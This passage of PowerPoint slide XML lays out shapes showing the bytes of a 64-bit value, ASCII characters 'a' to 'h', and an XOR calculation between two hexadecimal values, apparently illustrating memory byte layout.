          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="83" name="Rectangle 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C5B863-1A82-8D4E-A5F1-BFB7C01190E8}"/>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4" name="Rectangle 83">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCB4129-015B-8343-8725-142CFCA4DB28}"/>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5" name="Rectangle 84">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F6B0CC-2466-E24E-BDC0-3FC2F1135328}"/>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6" name="Rectangle 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AA2502-8605-6749-AD2F-6EF467162BC4}"/>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7" name="Rectangle 86">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{172DD3E4-019D-2345-B1C6-EAC7FA987442}"/>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8" name="Rectangle 87">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D520D5C-5D88-BC42-BCB7-5AE7576BBB70}"/>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89" name="Rectangle 88">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D9576A2-07D9-734F-9A54-1F881DA4FB9B}"/>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90" name="Rectangle 89">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15BBC653-7489-F44B-9C89-EDE21B61EEFB}"/>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65" name="Group 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F81D88-7D5F-9F4B-A9DC-6EAD5523C01F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="3779967"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="75" name="Rectangle 74">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCABD5A7-640C-E04E-BAF3-5CB429E8FA46}"/>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74</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Rectangle 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E94D48C-C7A4-1346-B7D7-AEC8366C6E6C}"/>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42</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="77" name="Rectangle 76">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{993F9703-A5A2-8C4B-ACF1-22642C0A5088}"/>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F3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="78" name="Rectangle 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35530F34-053B-8848-B960-EF75D5CA6B4B}"/>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0F</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="79" name="Rectangle 78">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4999E5C3-52E8-A448-896F-0D72541E54FF}"/>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94</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="80" name="Rectangle 79">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{484B8F47-207B-B442-A286-DD22EB4B4601}"/>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97</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="81" name="Rectangle 80">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C59CD5-0B2D-0843-B66C-60741638F11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A0</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="Rectangle 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A62F204-38CB-E84F-8113-3FEF21295852}"/>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00</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66" name="Group 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F322A2FB-3A9B-9741-85A3-408FA3B76936}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2192004"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Rectangle 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B40489-0798-4E4E-8ADE-66CDD2014D29}"/>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68" name="Rectangle 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4144F5-33F9-C346-B342-1A531D8B926B}"/>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69" name="Rectangle 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDCE2A22-5831-3E43-BEB8-4F118023902B}"/>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0" name="Rectangle 69">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6276368-FE10-F947-B355-C5507CC1272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1" name="Rectangle 70">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2C6F00-9951-1C4E-B4FD-264545018785}"/>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2" name="Rectangle 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C94AD8D-5E42-6845-ABEB-4BDD19F749EE}"/>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3" name="Rectangle 72">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E16648-EFBD-6945-BD94-BE1CD0CF7302}"/>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74" name="Rectangle 73">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C37F31F-F8A3-C04D-B37F-7DAE2ADA2782}"/>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
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79D771EE-A104-C448-8CCA-11C631862D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502900" y="5636731"/>
            <a:ext cx="6061275" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7442F30F9497A000 ^ 0x7442F30F94970069 = 0xA069</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="137" name="Group 136">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCE6D9CC-A362-F548-A541-B291882966F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="370156" y="2206357"/>
            <a:ext cx="4830980" cy="3175952"/>
            <a:chOff x="197157" y="2192004"/>
            <a:chExt cx="4830980" cy="3175952"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="138" name="Group 137">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5985B4C0-50CE-1F42-90EC-B1BE7DC2991F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="4573950"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="166" name="Rectangle 165">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E348A6A-D35B-F547-8C73-6DD53F94EBB2}"/>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68</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'h'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="167" name="Rectangle 166">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1630AB6F-DCD6-E342-B27A-D78F6BEA2C02}"/>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67</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'g'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="168" name="Rectangle 167">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBDF64E8-A7B3-E147-BC2C-56CC9974541A}"/>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66</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'f'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="169" name="Rectangle 168">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DBADC42-BEB9-D444-B00D-7164EDF22160}"/>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65</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'e'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="170" name="Rectangle 169">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4348716F-55D3-3544-B956-9BBF7640F88E}"/>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64</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'d'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="171" name="Rectangle 170">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B18F1F-C6CF-C342-A985-EED058253D6C}"/>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63</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'c'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="172" name="Rectangle 171">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82BC5D9-F52F-6940-B3F9-8E809A6A551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62</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'b'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="173" name="Rectangle 172">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705123C9-72FC-0340-94CE-CEF68109636A}"/>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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>61</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'a'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="139" name="Group 138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42DB9284-CC54-FF4D-8712-D6F97F93E575}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2985997"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="158" name="Rectangle 157">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E11A6BD-166D-5246-9A0B-E6E87217BFAF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920884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59" name="Rectangle 158">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64E00FCE-6A96-8346-ABDB-B7DE7D26CFC2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="945061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0" name="Rectangle 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95ECC865-17DB-AB44-BDA2-E9404428773E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9692388"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1" name="Rectangle 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD54DE3C-794E-324F-8E29-A1DBFAADB574}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9934159" y="3986006"/>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2" name="Rectangle 161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D78A9DEB-55F5-B949-B107-BD9F4E7981D3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10179379" y="3986005"/>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3" name="Rectangle 162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F851C885-4AE8-5A4A-AB6B-CEB7F2FBF21D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1042149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4" name="Rectangle 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B99701F1-E91A-3248-9E1A-E5B3DCAA1FC2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10666711"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sp>
            <p:nvSpPr>
              <p:cNvPr id="165" name="Rectangle 164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A50E1284-5A8A-A94F-A1E2-C93AFA86C5F6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10903803" y="3986002"/>
                <a:ext cx="245220" cy="245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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="140" name="Group 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752CC03B-A626-C449-90FA-098BE5E97580}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="3779967"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="150" name="Rectangle 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E12B1FA5-BACC-0B45-8410-F65CB417580E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920884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74</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="151" name="Rectangle 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5E9B49-B933-2C44-BF39-60117BB03E03}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="945061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42</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="152" name="Rectangle 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2889E522-3A1D-FF44-92A1-441DF02DEB2A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9692388"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F3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="153" name="Rectangle 152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278689C9-CC7E-FD48-B723-AFCAE247A269}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9934159" y="3986006"/>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0F</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="154" name="Rectangle 153">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E079724-8DAF-A640-B88B-2D0F7FE56174}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10179379" y="3986005"/>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94</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="Rectangle 154">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E2839A-2397-944D-AC46-75E0CCE205FC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1042149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97</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="156" name="Rectangle 155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23ADADBD-EF7E-6E43-AB67-7F00818A078E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10666711"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00</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>NUL</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="157" name="Rectangle 156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0946F6DE-2E84-0944-91A3-D18DC54CCA4E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10903803" y="3986002"/>
                <a:ext cx="245220" cy="24522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latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>69</a:t>
                </a:r>
              </a:p>
